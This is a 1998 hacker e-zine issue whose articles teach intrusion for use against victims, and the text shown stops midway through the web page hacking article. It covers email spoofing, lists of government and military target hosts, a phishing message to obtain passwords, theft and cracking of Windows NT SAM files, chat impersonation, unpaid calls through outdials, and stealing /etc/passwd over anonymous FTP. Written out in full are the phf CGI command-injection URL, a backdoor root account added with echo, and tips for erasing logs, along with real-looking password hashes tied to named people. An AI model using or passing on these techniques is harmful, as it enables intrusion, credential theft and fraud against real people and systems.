Copy Link
Add to Bookmark
Report
United Hackers Association 1 Issue 01
|---------------------------------------------------------------------------|
| -=[ United Hacker Association 1 - Magazine, Issue I ]=- |
| June 01, 1998 |
| E-Mail : uha1@gmx.net |
|---------------------------------------------------------------------------|
If you want you can add this text to your Homepage/BBS/Ftp/...
It's free, but please don't change anything without our permission!!
PLEASE USE THIS TEXT ON YOUR OWN RISK! WE ARE NOT RESPONSIBLE FOR ANYTHING!
Index :
1. A Guide To Anonymous Mail (by GhostHawk)
2. Ports (by GhostHawk)
3. Government Computer Systems (by GhostHawk)
4. Hacking Windows NT (by the file ripper)
5. How to get a persons IP (by Andreaz)
6. Hacking of TOL-Chat (by the file ripper)
7. Hacking of Yahoo-Chat (by Dave_Crash)
8. Hacking of VOL-Chat (by the hacking Cook)
9. How To Use Outdials (by AcidMeister)
10. Web Page Hacking For Newbies (by AcidMeister)
11. Some Relaying-Server (by the file ripper)
12. AOL-Gateways (by AcidMeister)
13. Trojaning (by the file ripper)
14. Programming Virii (by the file ripper)
15. XXX/Porno (by the file ripper)
If you want to publish one of your texts in our Magazine, just
mail us your text to : uha1@gmx.net (with subject line = UHA MAGAZINE),
we will review it and if it is a good one we will publish it.
Note : All texts are welcome.
You can write about everything you want, but it has to do something with
hacking/cracking/phreaking/carding/virii/computers ... -thanx-
--
We can manipulate you however we want.
We can read and change your personal datas.
We can take your identity.
Kill your existence.
We can come near to you from everywhere in the world.
You cann't escape!
-- (by the file ripper [UHA1])
!!IMPORTANT!!
If you have any questions, please don't mail us or the authors,
just go to http://www.uha1.com and post a message in our BBS!!!
!!IMPORTANT!!
Note : http://www.uha1.com (after the uha there is a ONE!)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1. A Guide To Anonymous Mail
by Ghost Hawk
GhostHawk@gmx.net
March 04, 1998
This is surprisingly easy. Sure you can download an anonymous e-mailer.
But thats no fun. In this file I will teach you how to do anonymous mail
by telneting into the server.
To anonymous mail someone fist off you have to telnet into a system on
port 25. Not all systems have port 25 open. I am going to use the
server i use the most as an example.
Ok first off i telnet into demonspawn.inna.net 25.
telnet demonspawn.inna.net
Trying 209.48.124.11...
Connected to demonspawn.inna.net.
Escape character is '^]'.
220 demonspawn.inna.net ESMTP Sendmail 8.7.5/8.7.3; Wed, 4 Mar 1998 17:36:34 -
0500
Ok, that meens i'm connected! Then you look at the server name. In this
case its demonspawn.inna.net. So i type the following.
"helo demonspawn.inna.net"
The server than returnes:
250 demonspawn.inna.net Hello yourhosthere.com [Your IP], pleased to meet you
Than you put who you want to make it from, by typing:
"MAIL FROM:BillGates@microsoft.com" You can put any e-mail you want it from!
The Server Returns:
250 BillGates@microsoft.com... Sender ok
You than put who you want to send it to.(i'm gonna use me as an example):
"RCPT TO:Ghosthawk@gmx.net"
The Server Returnes:
250 Recipient ok
After that you type:
"DATA"
Then the server says:
354 Enter mail, end with "." on a line by itself
Than all you have to do is type your message, than a "." and its sent! Easy!
Thats all for this file!!!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
2. Ports
by Ghost Hawk
GhostHawk@gmx.net
March 04, 1998
Describtion of Ports...
echo 7
discard 9
systat 11
daytime 13
netstat 15
qotd 17
chargen 19
ftp-data 20
ftp 21
telnet 23
smtp 25
time 37
rlp 39
name 42
whois 43
domain 53
nameserver 43
mtp 57
bootp 67
tftp 69
rje 77
finger 79
link 87
supdup 95
hostnames 101
iso-tsap 102
dictonary 103
x400 103
x400-snd 104
csnet-ns 105
pop 109
pop2 109
pop3 110
portmap 111
sunrpc 111
auth 113
sftp 115
path 117
uucp-path 117
nntp 119
ntp 123
nbname 137
nbdatagram 138
nbsession 139
news 144
sgmp 153
tcprepo 158
snmp 161
snmp-trap 162
print-srv 170
vmnet 175
load 315
vmnet0 400
systek 500
biff 512
exec 512
login 513
who 513
shell 514
syslog 514
printer 515
talk 517
ntalk 518
efs 520
route 520
timed 525
tempo 526
courier 530
conference 531
rvd-control 531
netnews 532
netwall 533
uucp 540
klogin 543
kshell 544
new-rwho 550
remotefs 556
remonitor 560
monitor 561
garcon 600
maitrd 601
busboy 602
acctmaster 700
acctslave 701
acct 702
acctlogin 703
acctprinter 704
elcsd 704
acctinfo 705
acctslave2 706
acctdisk 707
kerberos 750
kerbos-master 751
passwd-server 752
userreg-server 753
krb-prop 754
erlogin 888
kpop 1109
phone 1167
ingerslock 1524
maze 1666
nfs 2049
knetd 2053
eklogin 2105
rmt 5555
mtb 5556
man 9535
w 9536
mantst 9537
bnews 10000
rscs0 10000
queue 10001
rscs1 10001
poker 10002
rscs2 10002
gateway 10003
rscs3 10003
remp 10004
rscs4 10004
rscs5 10005
rscs6 10006
rscs7 10007
rscs8 10008
rscs9 10009
escsa 10010
rscsb 10011
qmaster 10012
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
3. Government Computer Systems
by Ghost Hawk
GhostHawk@gmx.net
March 04, 1998
I have made this file mainly for the newbie Hacker.
But it will also be a good reference for the Elite Hacker.
I'm gonna have a list of some really cool computers to Hack.
I also will have some really nice ways to get passwords for the comps.
Computer Addresses:
<Just telnet to the addresses>
<I dont recomend trying to hack the .gov and .mil addresses>
Government:
sundance.ll.nl.gov
ednet1.osl.or.gov
mecsys.mec.ohio.gov
ARD.FBI.GOV *FBI Main Computer*
Military:
hq.af.mil *American Air Force HEADquarters*
pentagon.mil *PENTAGON*
redstone.army.mil *Army*
wpgate.hqpacaf.af.mil *Area 51*
www.acc.af.mil
guam.andersen.af.mil
archive.afit.af.mil
www.hickamo.af.mil
cs1.langley.af.mil *CIA*
blackbird.afit.af.mil *American Nuclear agency*
dgis.dtic.dla.mil *D.O.D*
Nasa:
xfiles.gsfc.nasa.gov
phys.gsfc.nasa.gov
genesis.gsfc.nasa.gov
boris.gsfc.nasa.gov
plds3.gsfc.nasa.gov
nssdca.gsfc.nasa.gov
fdd.gsfc.nasa.gov
arioch.gsfc.nasa.gov
university.gsfc.nasa.gov
garc.gsfc.nasa.gov
pao.gsfc.nasa.gov
farside.gsfc.nasa.gov
Thats all I have for the computer adresses.
Nice Ways to Get Passwords!
Here are some ways that ive found over time to get passwords.
Annonymous FTP:
The most common way is to annonymously FTP into the server. Say you wanna
hack http://www.target.com you would ftp into ftp.target.com, then you
would get etc/passwd.
Get your password cracker out and crack the password. If its shadowed
you gotta problem. Shadowed passwords are where theres a * instead of
a password.
Annonymous E-Mail:
I neat little way i stumbled upon is to annonymous E-Mail them.
Works everytime, if their stupid. All you do is find out their ISP.
Its really easy. If their E-mail is loser@killme.com you would E-Mail them
using the E-Mail, root@killme.com, or maybe sysadmin@killme.com.
Then you say the following:
Mail from : root@killme.com
Mail to : loser@killme.com
Message :
Dear Mr. Loser,
There has been a successful Hack attempt on your account.
If you would like this problem fixed please change your password
to "demo3".
Thank You For Using Kill Me Internet.
End Message!
BOOM!! Instant password. That works on all kinds of of systems,
shell accounts, webpages, anything!
Social Enginnering:
I think this way is kind of funny. There are a lot of different
Social Engineering methods. I will only discuss one way. I found
this method and thought it was cool. What you do is you call up where
the computer is hosted. You get a username that you found from it and
pretend to be a girl. Normally the guys running these computers have
no life and only see the sun 5 minutes a day, so they will love a girl.
Tell them in a real sexual way that you would like to get your password
changed to whatever, normaly those guys will do anything for a girl.
Kinda lame but you might be able to use it as a last resort.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
4. Hacking Windows NT
by the file ripper
tfr@gmx.net
March 19, 1998
Okay, in this text I will shortly describe you a very easy way
how to hack a local Windows NT System. I write this text because I think
Micro$oft really sucks!
First check the system you want to hack...
I mean look at it, and check if you can boot with a Boot-Disk.
If you are able to boot from a Bootdisk, then all is no problem.
Once you are in the Dos-prompt (like "A:\>"), try to access c: by
typing in "C:". If this works, copy the "SAM."-file from the
directory "winnt\system\config" (if it's not located there, search
for it, with the dos-command : "dir /s sam. /a")
If you have no access to c:, then try a program called "NTFSDOS"
It gives you access on NTFS partions! It's really good. You are not logged!
But you also have only read-access.
Ok. After you got the file, get l0phtcrack from www.l0pht.com
Start L0phtcrack... File - Import SAM-File ... happy cracking!
Oh yeah... if the Bootdisk-trick don't works :
Log into the system like normal. If you don't have a username/password,
try to get in through the guest account. Just kill the CMOS (bios)
(because most of the time, the BIOS password is set, if it is you can
enter the BIOS without entering a password you don't need to kill
the CMOS!)
So you can de-lock the disk-lock!
Then restart your computer and re-setup the bios...
Don't forget : Bootsequenz should be : "A,C" (means, it first checks the
disk-drive for a bootable system)
Then work like said in the text above ...
A Other way :
Log in into the system, and get the "SAM._" file of the "winnt/repair"
directory. Before you can crack it, use :
"expand sam._ sam." (because it's compressed...)
Okay, then run l0phtcrack. If Service Pack 3 is installed this won't
work and you have to use the way as I said above.
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
5. How to get a persons IP:
>>>>>>--Andreaz--<<<<<<
E-mail: andreaz@hehe.com
March 21, 1998
1. *****Dummy*****
Ask the person for his IP.
2. ****E-mail****
Ask for the victim to send you an e-mail. When you have got the mail
look at the properties, there you can find the IP.
3. ****ICQ-way****
If you and the victim has ICQ then you can se his IP.
Click on the nick, and the choose info. There does the IP stand.
But sometimes has the person choosen not to show his IP, but
for this only use the old ICQ-client, then you will see the
IP as well, or just download a ICQ-sniffer.
4. ****IRC-way****
If you are on IRC, then type "/dns nick".
5. *****Trace*****
The easiest way is though to use an "IP-Tracer"
6. *****Guestbook***** (by the file ripper)
Ask him to sign your GuestBook. (It saves the IP!)
At www.lpage.com you can get a free guestbook.
7. *****Homepage***** (by the file ripper)
Ask him to go to your homepage.
There you add a automatically opening link, for advertisment.
The advertisment Server also will save the IP...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
6. Hacking of TOL-Chat
by the file ripper
tfr@gmx.net
March 23, 1998
Okay, I don't think anybody of you knows the TOL-Chat, because this
chat is only for Tyroleans (Austria). But it's a good example for a
"secure" ;) cgi-chat. Like you know cgi ist a Common Gateway Interface.
That means, everyone has read-write-delete... access.
Everytime you write a message in the chat, you write it in a cgi-file.
A CGI-URL looks like this (of TOL)
http://www.tirol.com/Cgi-bin/chat_mainframe_rel.cgi?Spitz=Fucker
That means you only have to change then name after Spitz.
In this case you are chatter "Fucker". If you change "Fucker" to
"Hallo", then you are chatter "Hallo" and you can get all the messages
which are only for him, and you also can write messages, and everyone
will think he wrote it... That's a too simple thing :)
I know this is not hacking, but enjoy!
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
7. Hacking of Yahoo-Chat
by Dave Crash
crash_dave_1997@yahoo.com
March 19, 1998
Okay, Dave_Crash found out a nice trick on the Yahoo-Chat, but he had
not the time to write a text about it, so I (the file ripper) will write
it for him.
First, Telnet into r2.chat.yahoo.com 4700
Note : r1-r12 are the chatservers.
Now it should ask you for a username and a password.
Type in "guest". It will let you in. Now you will see a couple of
messages scrolling down and down ...
It's like you are yourself in the chatroom, but you cann't write any
messages and cann't be "seen" by other chatters.
But that's not the thing we wanted...
Try typing in : "kick <chatter>".
You just kicked a chatter :). That's a nice trick.
You don't even need to be SuperUser or something like this, just kick
them out from the guestaccount *LOL*
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
8. Hacking VOL-Chat
by the hacking cook
Controlio@hotmail.com
May 20, 1998
Okay, I'am sure you don't know the Austria Online chat...it's a chat
from a provider in Austria...(go to: www.vol.at and there on chat)
But it's a good example for a HTML chat, and how to change your name there!
First you download the HTML-code of the chat (the part, where you can enter
your messages,... not the part where the messegas can be read)!
If you have done this, open the HTML-code in Notepad, so, now scroll to
the end of the text and there is a line:
<INPUT TYPE="hidden" NAME="nick" VALUE="HORNY">
so, now you are "HORNY" you only change the name, load the HTML again, and
are this chatter if u become a nother hacker load the HTML in your editor
and change the name, and load it again....
Dont get confused, if there stands "hacked" this isn't
your username!
I know, this is not realy hacking, but, I think it's
fun...so enjoy
If you dont want to register you (you must register you, to become a password
and so on) here is the complete HTML:
<HTML>
<HEAD>
</HEAD>
<SCRIPT LANGUAGE=JavaScript>
function resetinput(form) {
form.submit();
form.mess.value="";
form.mess.focus();
form.mess.select();
return (false);
}
</SCRIPT>
<BODY BGCOLOR="#ffffff">
<form ACTION=http://chatix1.tele.net/scripts/chatnt/chatoutput.pl METHOD=GET TARGET=entries onSubmit="return resetinput(this)"><input type=hidden name="METHOD" value="GET"><input type=hidden name="TARGET" value="entries"><input type=hidden name="onSubmit"
<TT>Spitzname: <STRONG>hacked</STRONG></TT>
Meldungen: <SELECT NAME="anzahl">
<OPTION VALUE=5>5</OPTION>
<OPTION VALUE=6>6</OPTION>
<OPTION VALUE=7>7</OPTION>
<OPTION VALUE=8>8</OPTION>
<OPTION VALUE=9>9</OPTION>
<OPTION VALUE=10>10</OPTION>
<OPTION VALUE=11>11</OPTION>
<OPTION VALUE=12>12</OPTION>
<OPTION VALUE=13>13</OPTION>
<OPTION VALUE=14>14</OPTION>
<OPTION VALUE=15 SELECTED>15</OPTION>
<OPTION VALUE=16>16</OPTION>
<OPTION VALUE=17>17</OPTION>
<OPTION VALUE=18>18</OPTION>
<OPTION VALUE=19>19</OPTION>
<OPTION VALUE=20>20</OPTION>
<OPTION VALUE=21>21</OPTION>
<OPTION VALUE=22>22</OPTION>
<OPTION VALUE=23>23</OPTION>
<OPTION VALUE=24>24</OPTION>
<OPTION VALUE=25>25</OPTION>
<OPTION VALUE=26>26</OPTION>
<OPTION VALUE=27>27</OPTION>
<OPTION VALUE=28>28</OPTION>
<OPTION VALUE=29>29</OPTION>
<OPTION VALUE=30>30</OPTION>
</SELECT>
Chatraum: <SELECT NAME="raum">
<OPTION VALUE=1 SELECTED>Entree</OPTION>
<OPTION VALUE=2>Lobby</OPTION>
<OPTION VALUE=3>Carinthia</OPTION>
<OPTION VALUE=4>Niederösterreich</OPTION>
<OPTION VALUE=5>Oberösterreich</OPTION>
<OPTION VALUE=6>Styria</OPTION>
<OPTION VALUE=7>Vienna</OPTION>
<OPTION VALUE=8>Vorarlberg</OPTION>
<OPTION VALUE=9>Zürich</OPTION>
<OPTION VALUE=10>Rheintal</OPTION>
<OPTION VALUE=11>Liechtenstein</OPTION>
<OPTION VALUE=12>Südtirol</OPTION>
</SELECT>
<INPUT TYPE="hidden" NAME="nick" VALUE="HORNY">
<INPUT TYPE="hidden" NAME="cfg" VALUE="volchat">
<BR CLEAR=LEFT><TT>Meldung : <INPUT TYPE="text" NAME="mess" VALUE="" SIZE=30 MAXLENGTH=150><INPUT TYPE="submit" VALUE="Senden!"></TT></FORM>
Erscheint die Meldung "Transfer interrupted", bitte auf Reload klicken.
</BODY>
</HTML>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
9. How To Use Outdials
by AcidMeister
warming@vol.com
This file is for folks who want to get started using outdials. I tried to
explain everything in detail, assuming no prior knowledge. Have phun.
I have used a lot of information obtained from other g-files in putting
together this file.
Introduction: Outdials
~~~~~~~~~~~~~~~~~~~~~~
Outdials are extremely useful things which can be used to call long
distance without paying and without using codes. Essentially, an
outdial is a modem which is connected to a network. You call up the
network, then connect to the outdial over the network, then use the modem
to call whatever system (BBS) you want to connect to. Sounds
complicated, but it really isn't.
You will be using modems which are connected to the Telenet network. There
are outdials connected to Telenet in every area code. So, you can call
just about anywhere you want. The problem is that generally, these outdials
don't take collect connections over Telenet. So, we have to use a way of
getting around that. That way is called PAC*IT. PAC*IT is a service
which is connected to Telenet.
Part I - Connecting to the Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ok, first you need to connect to the network. The way to connect
to Telenet in order to use these outdials is through Pac*it, which is
some sort of gay PC pursuit deal. Anyway, call Pac*it: 1-800-234-2796
at 2400/1200 7E1. After connecting, log on:
1200 baud: just hit <cr> a couple of times
2400 baud: send an @ (shift-2) then a <cr>
It will now say
PAC*IT Plus
XXXXXXXXXXX111
The X's don't matter, what matters is the last three digits. You can only
connect to U.S. modems if this number is between 100 and 300. If the
three numbers on the end aren't between 100 and 300 then hang up and call
back. Eventually, you will get one that is OK.
Under the numbers it will say: 'TERMINAL =' just hit return here.
You will now see the well known '@' prompt. This means you are
connected to Telenet.
Part II - Connecting to the Outdial
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Now, you need to know a bit about the way
systems on Telenet are addressed. To connect to a system (i.e. outdial)
at the '@' prompt, you type the address of the system you want and hit
return. You must use the Telenet International Address Format to
connect to outdials if you called in through PAC*IT. It looks like
this:
|------------------------ Data Network Ident. Code (DNIC)
|
| |----------------- Area code
| |
| | |----------- DTE address (the specific system in the
/\ | / \ area code)
/ \ / \ / \ /\----- Port Address
IIII AAA NNNNN PP
For example the Telenet address of 201 346 becomes 31102010034600
So, connect to the outdial in the area code you want by typing in the complete
address of the outdial. I know, you are saying to yourself "Where the
hell do I get addresses of outdials?" Well, at the end of this g-file,
of course.
After you have entered the address, you will get a 'CONNECTED' or else
some error message. If you get an error, try again, or try another
outdial.
Part III - Using the Outdial
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After you connect, hit ctrl-E a few times, then hit return. After a few
seconds you should get a message like '*Hello, I'm Ready*' You are now
connected to a modem! Help is available, just enter a ? or H. The
command you are most concerned with is D (dial command). So, enter D
and it should ask you for the number. Just type in the phone number
you want to dial (no area code). It should then say "Dialing..." If
you connect, great, you should know what to do now. If the number is
busy, or out-of-order or whatever, the outdial will return to command
mode. You can then dial again.
You can generally disconnect from the outdial itself by entering an '@'
then hitting return in the command mode. You should then get the '@'
prompt back. Now you can connect to another outdial in a different area
code if you want to. Just follow the procedure in Part II again.
Part IV - Outdial Addresses
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Area Area
code Baud Address code Baud Address
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NJNEW 300: 311020100001 CAOAK 300: 311041500005
1200: 311020100301 1200: 311041500216
2400: 311020100022 2400: 311041500011
DCWAS 300: 311020200115 CAPAL 300: 311041500106
1200: 311020200116 1200: 311041500224
2400: 311020200117 2400: <NONE>
CTHAR 300: <NONE> CASFA 300: 311041500215
1200: 311020300120 1200: 311041500217
2400: <NONE> 2400: 311041500023
WASEA 300: 311020600017 ORPOR 300: 311050300020
1200: 311020600019 1200: 311050300021
2400: 311020600021 2400: <NONE>
NYNYO 300: 311021200315 AZPHO 300: 311060200022
1200: 311021200316 1200: 311060200023
2400: 311021200028 2400: 311060200026
CALAN 300: 311021300412 MNMIN 300: 311061200120
1200: 311021300413 1200: 311061200121
2400: 311021300023 2400: 311061200022
TXDAL 300: 311021400117 MABOS 300: 311061700311
1200: 311021400118 1200: 311061700313
2400: 311021400022 2400: 311061700026
PAPHI 300: 311021500112 TXHOU 300: 311071300113
1200: 311021500005 1200: 311071300114
2400: 311021500022 2400: 311071300024
OHCLE 300: 311021600020 CACOL 300: 311071400023
1200: 311021600021 1200: 311071400004
2400: 311021600120 2400: 311071400024
CODEN 300: 311030300114 CASAN 300: 311071400119
1200: 311030300115 1200: 311071400213
2400: 311030300021 2400: 311071400124
FLMIA 300: 311030500120 CASDI 300: 311071400102
1200: 311030500121 (619) 1200: 311071400210
2400: 311030500122 2400: 311071400121
ILCHI 300: 311031200410 UTSLC 300: 311080100020
1200: 311031200411 1200: 311080100021
2400: 311031200024 2400: 311080100012
MIDET 300: 311031300214 FLTAM 300: 311081300020
1200: 311031300216 1200: 311081300021
2400: 311031300024 2400: 311081300124
MOSLO 300: 311031400005 MOKCI 300: 311081600104
1200: 311031400421 1200: 311081600221
2400: 311031400020 2400: 311081600113
GAATL 300: 311040400113 CAGLE 300
1200: 311040400114 1200: 311081800021
2400: 311040400022 2400
CASJO 300: 311040800111 CASAC 300: 311091600007
1200: 311040800021 1200: 311091600011
2400: 311040800110 2400: 311091600012
WIMIL 300: 311041400020 NCRTP 300: 311091900020
1200: 311041400021 1200: 311091900021
2400: 311041400120 2400: 311091900124
Part V - Finishing Up
~~~~~~~~~~~~~~~~~~~~~
As best I can tell, this is a very safe method if you don't abuse it,
over use it, etc. Remember, this is a 1-800 number, so if you call it
200 times in a week or 30 times in a day, you may get a call yourself.
So, to keep this method alive for everyone to use, don't do this too
much.
I hope this file has been helpful to you. There are plenty of people
who know a lot more about this stuff than I do. But, I will definitely
try to help anyone out if I can.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
10. Web Page Hacking For Newbies
by AcidMeister
warming@vol.com
December 30, 1997
First of all you will need an ftp program such as ws_ftp. I use Voyager FTP
downloadable at http://www.windows95.com it's real simple and easy to use,
so try it if you haven't dealt with ftp before. Now once you have the
program find an address like http://www.shiga-pc.ac.jp you can find
addresses like this by going to a search engine such as AltaVista and
running a search for url:ac.jp this tells the search engine to give you
all the academic addresses in Japan ex. ac=academic jp=Japan , you can
try this with any country ex. url:dk . But for now let's just focus on
the Japanese servers. When u have an address (I would recommend making a
list of about 100 and trying them all) go to your ftp program and type in
the address ex. http://www.shiga-pc.ac.jp note.. You will have to log in
anonymously. You should then get a list of folders on the remote system
usr, pub,etc, dev, bin. See the etc folder? open it, once opened you should
see some files passwd and group, open or view the file passwd (this is where
the passwords for the system are stored), you should hopefully get something
that looks like this.
root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:
uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
sso:Nologin:6:7:System Security Officer:/etc/security:
news:Nologin:8:8:USENET News System:/usr/spool/netnews:
sccs:PASSWORD HERE:9:10:Source Code Control:/:
ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh
rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
jgordon:w4735loqb8F5I:275:15:James."Tiger" Gordon:/usr/email/users/jgordon:/bin/csh
lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh
erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh
dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh
This means you've hit the jackpot, in this case you should get a password
cracker download one at (http://www.hackersweb.com go to the hacking toolz
section), I would recommend for the beginning hacker to get a password
cracker such as killer cracker because it's extremely easy to use. Once you
have downloaded killer cracker you will need a dictionary file
(get one at http://www.hackersweb.com look in the extra toolz section),
dictionary filez are better the bigger they are so I would recommend
getting one at around 10 MB or more. Now the passwords from the passwd
file off the server you are hacking, you will need to save them to a file
and place them in the same directory as Killer Cracker, you will also need
to have your dictionary file in the same directory. Now you are ready to
go, just run killer cracker and tell it the name of the Pwfile=the password
file and the name of the word file=your dictionary file, the valid file will
be the file where the output of the password cracker will be put just give
it a name such as crack.txt. Once the cracker is done cracking the password
files for you goto the valid file and take a look the file should look
something like this root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember this is an example). This file says that the username is root
and the password is root if the file had been like this.
root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember again just an example) the login or username would be root and
the password would be dumbass, well that's it just ftp to the site using
the login and password. Note if you get root type in the following once
you have logged in:- echo "myserver::0:0:Test User:/:/bin/csh">>etc\passwd
this will allow you to login to the server with 1:myserver so you
get the admin suspicious when they see people login as root. Hide yourself
as much as possible, if you already have a shell then go through that first
when loggin on, or telnet to the hacked site shell and then re-telnet to the
hacked shell using the hacked shell, if you see what I mean, so your who
appears as local host. Also get some c scripts which delete your presence,
erases you off logs etc
Now if you were not as lucky to get exactly the same password file as shown
in the example above then maybe you got something like this.
root:*:0:1:Operator:/:
ftp:*:53:53:anonymous ftp:/pub:
t2:*:201:201:Takaoka Tadashi:/pub:
This means that the passwd file is shadowed, if this is the case then
welcome to the administrators world of trying to stop hackers, this is
where you cant really do anything. However there is one thing to do
sometimes in very rare cases there may be a folder on the remote system
that can be accessed by an anonymous login called shadowed, shadow, or
secret if this is the case the password files should be in there,
congratulations. If there isn't a folder like this, and the passwd file
is shadowed then bad luck, go to the next address on your list.
Now that you have tried the first thing as shown above there are a couple
of other methods you may also want to try one is FTP hacking shown below
Go to a dos prompt after you are connected to the internet .
Type.
ftp www.victim=the site address
server will ask for a username press enter
server will ask for a password press enter
at the prompt type quote user ftp
then type
quote cwd ~root
then type
quote pass ftp
If you get in make sure you delete the log file they might look at it and
see that you were on. Once you get on the passwd file is in etc/passwd so
type cd etc then type get passwd. If you have done the above right and the
server is old you will have root access. By the way root is the highest
security status you can have.
Another good way of getting root or a shell at least is through browser
hacking. Again well use Japanese educational servers as our target. To do
this you will need a browser such as Netscape or Internet Explorer, you
will also need a telnet program, you can either download a telnet program
at http://www.windows95.com or use the one that already comes with dos.
To access the telnet program that comes with dos go to your dos windows and
type in telnet www.site.com the site.com stand for the site you want to
telnet to, it could be anything like www.geidai.ac.jp or
www.tulips.tsukuba.ac.jp . You will also need a cracker program I would
recommend using Killer Cracker and applying as above.
Next thing you do is open your browser and run a search for url:ac.jp ,
like explained above. Again I would recommend making a big list of your
targets. Now when you have your targets we address type it in your browser
and add this to it
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
or
http://www.webpage.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
To all you out there who are slightly advanced, I know this is the phf
technique and it is virtually dead, but you'll be surprised where you can
use this.
This technique of finding the password file was first used in November 1996
on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
servers, so this won't work on something like www.nasa.gov or most of the
www.*.com sites. But still works on many university servers outside Europe
and the U.S.
O.K. Once the url is entered you will see a number of things:-
Error 404
Cgi-bin/phf is not found on this server (the most common one)
Or
Warning
You do not have permission to view cgi-bin/phf?/ on this server
There are a number of other things the server might say, but the thing you
want it to say is this:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:fdn7:3:3:0000-Admin(0000):/:
adm:dehf6:4:4:0000-Admin(0000):/var/adm:
wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
smtp:cmvof:0:0:mail daemon user:/:
uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:eoend:37:4:Network Admin:/usr/net/nls:
nobody:ccvjcvj:60001:60001:uid no b
etc
This means you have hit the jackpot!!!
If you get something similar to this but all lines have something in common
like the following:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/bin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
wnn:x:5:5:0000-Admin(0000):/var/adm:
news:x:6:6:0000-Admin(0000):/usr/lib/news:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
